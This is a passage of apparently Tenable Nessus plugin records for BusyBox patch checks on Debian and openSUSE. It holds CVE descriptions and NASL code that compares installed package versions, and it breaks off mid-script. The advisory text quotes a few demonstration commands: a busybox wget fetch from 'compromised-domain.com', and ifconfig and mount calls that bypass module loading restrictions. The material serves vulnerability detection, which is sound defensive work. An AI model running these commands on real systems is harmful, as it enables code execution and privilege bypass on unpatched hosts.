subdirectory (/dev/dir1/dir2.../node), the intermediate directories are created with incorrect permissions.\n\nCVE-2014-4607\n\nAn integer overflow may occur when processing any variant of a 'literal run' in the lzo1x_decompress_safe function. Each of these three locations is subject to an integer overflow when processing zero bytes. This exposes the code that copies literals to memory corruption.\n\nCVE-2014-9645\n\nThe add_probe function in modutils/modprobe.c in BusyBox allows local users to bypass intended restrictions on loading kernel modules via a / (slash) character in a module name, as demonstrated by an 'ifconfig /usbserial up' command or a 'mount -t /snd_pcm none /' command.\n\nCVE-2016-2147\n\nInteger overflow in the DHCP client (udhcpc) in BusyBox allows remote attackers to cause a denial of service (crash) via a malformed RFC1035-encoded domain name, which triggers an out-of-bounds heap write.\n\nCVE-2016-2148\n\nHeap-based buffer overflow in the DHCP client (udhcpc) in BusyBox allows remote attackers to have unspecified impact via vectors involving OPTION_6RD parsing.\n\nCVE-2017-15873\n\nThe get_next_block function in archival/libarchive /decompress_bunzip2.c in BusyBox has an Integer Overflow that may lead to a write access violation.\n\nCVE-2017-16544\n\nIn the add_match function in libbb/lineedit.c in BusyBox, the tab autocomplete feature of the shell, used to get a list of filenames in a directory, does not sanitize filenames and results in executing any escape sequence in the terminal. This could potentially result in code execution, arbitrary file writes, or other attacks.\n\nCVE-2018-1000517\n\nBusyBox contains a Buffer Overflow vulnerability in Busybox wget that can result in a heap-based buffer overflow. This attack appears to be exploitable via network connectivity.\n\nCVE-2015-9621\n\nUnziping a specially crafted zip file results in a computation of an invalid pointer and a crash reading an invalid address.\n\nFor Debian 9 stretch, these problems have been fixed in version 1:1.22.0-19+deb9u1.\n\nWe recommend that you upgrade your busybox packages.\n\nFor the detailed security status of busybox please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/busybox\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-16T00:00:00", "type": "nessus", "title": "Debian DLA-2559-1 : busybox security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-5325", "CVE-2013-1813", "CVE-2014-4607", "CVE-2014-9645", "CVE-2015-9261", "CVE-2015-9621", "CVE-2016-2147", "CVE-2016-2148", "CVE-2017-15873", "CVE-2017-16544", "CVE-2018-1000517"], "modified": "2021-02-19T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:busybox", "p-cpe:/a:debian:debian_linux:busybox-static", "p-cpe:/a:debian:debian_linux:busybox-syslogd", "p-cpe:/a:debian:debian_linux:busybox-udeb", "p-cpe:/a:debian:debian_linux:udhcpc", "p-cpe:/a:debian:debian_linux:udhcpd", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2559.NASL", "href": "https://www.tenable.com/plugins/nessus/146504", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2559-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(146504);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/19\");\n\n script_cve_id(\"CVE-2011-5325\", \"CVE-2015-9261\", \"CVE-2016-2147\", \"CVE-2016-2148\", \"CVE-2017-15873\", \"CVE-2017-16544\", \"CVE-2018-1000517\");\n\n script_name(english:\"Debian DLA-2559-1 : busybox security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Busybox, utility programs for small and embedded systems, was affected\nby several security vulnerabilities. The Common Vulnerabilities and\nExposures project identifies the following issues.\n\nCVE-2011-5325\n\nA path traversal vulnerability was found in Busybox implementation of\ntar. tar will extract a symlink that points outside of the current\nworking directory and then follow that symlink when extracting other\nfiles. This allows for a directory traversal attack when extracting\nuntrusted tarballs.\n\nCVE-2013-1813\n\nWhen device node or symlink in /dev should be created inside\n2-or-deeper subdirectory (/dev/dir1/dir2.../node), the intermediate\ndirectories are created with incorrect permissions.\n\nCVE-2014-4607\n\nAn integer overflow may occur when processing any variant of a\n'literal run' in the lzo1x_decompress_safe function. Each of these\nthree locations is subject to an integer overflow when processing zero\nbytes. This exposes the code that copies literals to memory\ncorruption.\n\nCVE-2014-9645\n\nThe add_probe function in modutils/modprobe.c in BusyBox allows local\nusers to bypass intended restrictions on loading kernel modules via a\n/ (slash) character in a module name, as demonstrated by an 'ifconfig\n/usbserial up' command or a 'mount -t /snd_pcm none /' command.\n\nCVE-2016-2147\n\nInteger overflow in the DHCP client (udhcpc) in BusyBox allows remote\nattackers to cause a denial of service (crash) via a malformed\nRFC1035-encoded domain name, which triggers an out-of-bounds heap\nwrite.\n\nCVE-2016-2148\n\nHeap-based buffer overflow in the DHCP client (udhcpc) in BusyBox\nallows remote attackers to have unspecified impact via vectors\ninvolving OPTION_6RD parsing.\n\nCVE-2017-15873\n\nThe get_next_block function in archival/libarchive\n/decompress_bunzip2.c in BusyBox has an Integer Overflow that may lead\nto a write access violation.\n\nCVE-2017-16544\n\nIn the add_match function in libbb/lineedit.c in BusyBox, the tab\nautocomplete feature of the shell, used to get a list of filenames in\na directory, does not sanitize filenames and results in executing any\nescape sequence in the terminal. This could potentially result in code\nexecution, arbitrary file writes, or other attacks.\n\nCVE-2018-1000517\n\nBusyBox contains a Buffer Overflow vulnerability in Busybox wget that\ncan result in a heap-based buffer overflow. This attack appears to be\nexploitable via network connectivity.\n\nCVE-2015-9621\n\nUnziping a specially crafted zip file results in a computation of an\ninvalid pointer and a crash reading an invalid address.\n\nFor Debian 9 stretch, these problems have been fixed in version\n1:1.22.0-19+deb9u1.\n\nWe recommend that you upgrade your busybox packages.\n\nFor the detailed security status of busybox please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/busybox\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/02/msg00020.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/busybox\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/busybox\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:busybox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:busybox-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:busybox-syslogd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:busybox-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:udhcpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:udhcpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"busybox\", reference:\"1:1.22.0-19+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"busybox-static\", reference:\"1:1.22.0-19+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"busybox-syslogd\", reference:\"1:1.22.0-19+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"busybox-udeb\", reference:\"1:1.22.0-19+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"udhcpc\", reference:\"1:1.22.0-19+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"udhcpd\", reference:\"1:1.22.0-19+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-01T00:00:00", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in the openSUSE-SU-2022:0135-1 advisory.\n\n - Directory traversal vulnerability in the BusyBox implementation of tar before 1.22.0 v5 allows remote attackers to point to files outside the current working directory via a symlink. (CVE-2011-5325)\n\n - huft_build in archival/libarchive/decompress_gunzip.c in BusyBox before 1.27.2 misuses a pointer, causing segfaults and an application crash during an unzip operation on a specially crafted ZIP file.\n (CVE-2015-9261)\n\n - Integer overflow in the DHCP client (udhcpc) in BusyBox before 1.25.0 allows remote attackers to cause a denial of service (crash) via a malformed RFC1035-encoded domain name, which triggers an out-of-bounds heap write. (CVE-2016-2147)\n\n - Heap-based buffer overflow in the DHCP client (udhcpc) in BusyBox before 1.25.0 allows remote attackers to have unspecified impact via vectors involving OPTION_6RD parsing. (CVE-2016-2148)\n\n - The recv_and_process_client_pkt function in networking/ntpd.c in busybox allows remote attackers to cause a denial of service (CPU and bandwidth consumption) via a forged NTP packet, which triggers a communication loop. (CVE-2016-6301)\n\n - The get_next_block function in archival/libarchive/decompress_bunzip2.c in BusyBox 1.27.2 has an Integer Overflow that may lead to a write access violation. (CVE-2017-15873)\n\n - archival/libarchive/decompress_unlzma.c in BusyBox 1.27.2 has an Integer Underflow that leads to a read access violation. (CVE-2017-15874)\n\n - In the add_match function in libbb/lineedit.c in BusyBox through 1.27.2, the tab autocomplete feature of the shell, used to get a list of filenames in a directory, does not sanitize filenames and results in executing any escape sequence in the terminal. This could potentially result in code execution, arbitrary file writes, or other attacks. (CVE-2017-16544)\n\n - Busybox contains a Missing SSL certificate validation vulnerability in The busybox wget applet that can result in arbitrary code execution. This attack appear to be exploitable via Simply download any file over HTTPS using busybox wget https://compromised-domain.com/important-file. (CVE-2018-1000500)\n\n - BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e. (CVE-2018-1000517)\n\n - An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in networking/udhcp/common.c that 4-byte options are indeed 4 bytes. (CVE-2018-20679)\n\n - An issue was discovered in BusyBox through 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and/or relay) might allow a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to assurance of a 4-byte length when decoding DHCP_SUBNET. NOTE: this issue exists because of an incomplete fix for CVE-2018-20679. (CVE-2019-5747)\n\n - decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data. (CVE-2021-28831)\n\n - A NULL pointer dereference in Busybox's man applet leads to denial of service when a section name is supplied but no page argument is given (CVE-2021-42373)\n\n - An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that (CVE-2021-42374)\n\n - An incorrect handling of a special element in Busybox's ash applet leads to denial of service when processing a crafted shell command, due to the shell mistaking specific characters for reserved characters. This may be used for DoS under rare conditions of filtered command input. (CVE-2021-42375)\n\n - A NULL pointer dereference in Busybox's hush applet leads to denial of service when processing a crafted shell command, due to missing validation after a \\x03 delimiter character. This may be used for DoS under very rare conditions of filtered command input. (CVE-2021-42376)\n\n - An attacker-controlled pointer free in Busybox's hush applet leads to denial of service and possible code execution when processing a crafted shell command, due to the shell mishandling the &&& string. This may be used for remote code execution under rare conditions of filtered command input. (CVE-2021-42377)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function (CVE-2021-42378)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function (CVE-2021-42379)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function (CVE-2021-42380)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function (CVE-2021-42381)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function (CVE-2021-42382)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function (CVE-2021-42383, CVE-2021-42385)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function (CVE-2021-42384)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function (CVE-2021-42386)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-01-21T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : busybox (openSUSE-SU-2022:0135-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-5325", "CVE-2015-9261", "CVE-2016-2147", "CVE-2016-2148", "CVE-2016-6301", "CVE-2017-15873", "CVE-2017-15874", "CVE-2017-16544", "CVE-2018-20679", "CVE-2018-1000500", "CVE-2018-1000517", "CVE-2019-5747", "CVE-2021-28831", "CVE-2021-42373", "CVE-2021-42374", "CVE-2021-42375", "CVE-2021-42376", "CVE-2021-42377", "CVE-2021-42378", "CVE-2021-42379", "CVE-2021-42380", "CVE-2021-42381", "CVE-2021-42382", "CVE-2021-42383", "CVE-2021-42384", "CVE-2021-42385", "CVE-2021-42386"], "modified": "2022-01-24T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:busybox", "p-cpe:/a:novell:opensuse:busybox-static", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2022-0135-1.NASL", "href": "https://www.tenable.com/plugins/nessus/156938", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:0135-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156938);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\n \"CVE-2011-5325\",\n \"CVE-2015-9261\",\n \"CVE-2016-2147\",\n \"CVE-2016-2148\",\n \"CVE-2016-6301\",\n \"CVE-2017-15873\",\n \"CVE-2017-15874\",\n \"CVE-2017-16544\",\n \"CVE-2018-20679\",\n \"CVE-2018-1000500\",\n \"CVE-2018-1000517\",\n \"CVE-2019-5747\",\n \"CVE-2021-28831\",\n \"CVE-2021-42373\",\n \"CVE-2021-42374\",\n \"CVE-2021-42375\",\n \"CVE-2021-42376\",\n \"CVE-2021-42377\",\n \"CVE-2021-42378\",\n \"CVE-2021-42379\",\n \"CVE-2021-42380\",\n \"CVE-2021-42381\",\n \"CVE-2021-42382\",\n \"CVE-2021-42383\",\n \"CVE-2021-42384\",\n \"CVE-2021-42385\",\n \"CVE-2021-42386\"\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0344\");\n\n script_name(english:\"openSUSE 15 Security Update : busybox (openSUSE-SU-2022:0135-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2022:0135-1 advisory.\n\n - Directory traversal vulnerability in the BusyBox implementation of tar before 1.22.0 v5 allows remote\n attackers to point to files outside the current working directory via a symlink. (CVE-2011-5325)\n\n - huft_build in archival/libarchive/decompress_gunzip.c in BusyBox before 1.27.2 misuses a pointer, causing\n segfaults and an application crash during an unzip operation on a specially crafted ZIP file.\n (CVE-2015-9261)\n\n - Integer overflow in the DHCP client (udhcpc) in BusyBox before 1.25.0 allows remote attackers to cause a\n denial of service (crash) via a malformed RFC1035-encoded domain name, which triggers an out-of-bounds\n heap write. (CVE-2016-2147)\n\n - Heap-based buffer overflow in the DHCP client (udhcpc) in BusyBox before 1.25.0 allows remote attackers to\n have unspecified impact via vectors involving OPTION_6RD parsing. (CVE-2016-2148)\n\n - The recv_and_process_client_pkt function in networking/ntpd.c in busybox allows remote attackers to cause\n a denial of service (CPU and bandwidth consumption) via a forged NTP packet, which triggers a\n communication loop. (CVE-2016-6301)\n\n - The get_next_block function in archival/libarchive/decompress_bunzip2.c in BusyBox 1.27.2 has an Integer\n Overflow that may lead to a write access violation. (CVE-2017-15873)\n\n - archival/libarchive/decompress_unlzma.c in BusyBox 1.27.2 has an Integer Underflow that leads to a read\n access violation. (CVE-2017-15874)\n\n - In the add_match function in libbb/lineedit.c in BusyBox through 1.27.2, the tab autocomplete feature of\n the shell, used to get a list of filenames in a directory, does not sanitize filenames and results in\n executing any escape sequence in the terminal. This could potentially result in code execution, arbitrary\n file writes, or other attacks. (CVE-2017-16544)\n\n - Busybox contains a Missing SSL certificate validation vulnerability in The busybox wget applet that can\n result in arbitrary code execution. This attack appear to be exploitable via Simply download any file over\n HTTPS using busybox wget https://compromised-domain.com/important-file. (CVE-2018-1000500)\n\n - BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a\n Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear\n to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit\n 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e. (CVE-2018-1000517)\n\n - An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by\n the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack\n by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in\n networking/udhcp/common.c that 4-byte options are indeed 4 bytes. (CVE-2018-20679)\n\n - An issue was discovered in BusyBox through 1.30.0. An out of bounds read in udhcp components (consumed by\n the DHCP server, client, and/or relay) might allow a remote attacker to leak sensitive information from\n the stack by sending a crafted DHCP message. This is related to assurance of a 4-byte length when decoding\n DHCP_SUBNET. NOTE: this issue exists because of an incomplete fix for CVE-2018-20679. (CVE-2019-5747)\n\n - decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer,\n with a resultant invalid free or segmentation fault, via malformed gzip data. (CVE-2021-28831)\n\n - A NULL pointer dereference in Busybox's man applet leads to denial of service when a section name is\n supplied but no page argument is given (CVE-2021-42373)\n\n - An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when\n crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that\n (CVE-2021-42374)\n\n - An incorrect handling of a special element in Busybox's ash applet leads to denial of service when\n processing a crafted shell command, due to the shell mistaking specific characters for reserved\n characters. This may be used for DoS under rare conditions of filtered command input. (CVE-2021-42375)\n\n - A NULL pointer dereference in Busybox's hush applet leads to denial of service when processing a crafted\n shell command, due to missing validation after a \\x03 delimiter character. This may be used for DoS under\n very rare conditions of filtered command input. (CVE-2021-42376)\n\n - An attacker-controlled pointer free in Busybox's hush applet leads to denial of service and possible code\n execution when processing a crafted shell command, due to the shell mishandling the &&& string. This may\n be used for remote code execution under rare conditions of filtered command input. (CVE-2021-42377)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the getvar_i function (CVE-2021-42378)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the next_input_file function (CVE-2021-42379)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the clrvar function (CVE-2021-42380)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the hash_init function (CVE-2021-42381)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the getvar_s function (CVE-2021-42382)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the evaluate function (CVE-2021-42383, CVE-2021-42385)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the handle_special function (CVE-2021-42384)\n\n - A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when\n processing a crafted awk pattern in the nvalloc function (CVE-2021-42386)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/951562\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/970662\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/970663\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/991940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1064976\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1064978\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1069412\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1099260\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1099263\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1102912\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1121426\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1121428\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1184522\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1192869\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/YB6DIPEMLRTDD3RU77DD7UYYKBEEKYDY/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ec6f9ce1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2011-5325\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-9261\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-2147\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-2148\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-6301\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-15873\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-15874\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-16544\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000500\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000517\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-20679\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-5747\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-28831\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42373\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42374\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42375\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42376\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42377\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42378\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42379\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42380\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42381\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42382\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42383\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42384\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42385\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-42386\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected busybox and / or busybox-static packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1000517\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:busybox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:busybox-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) 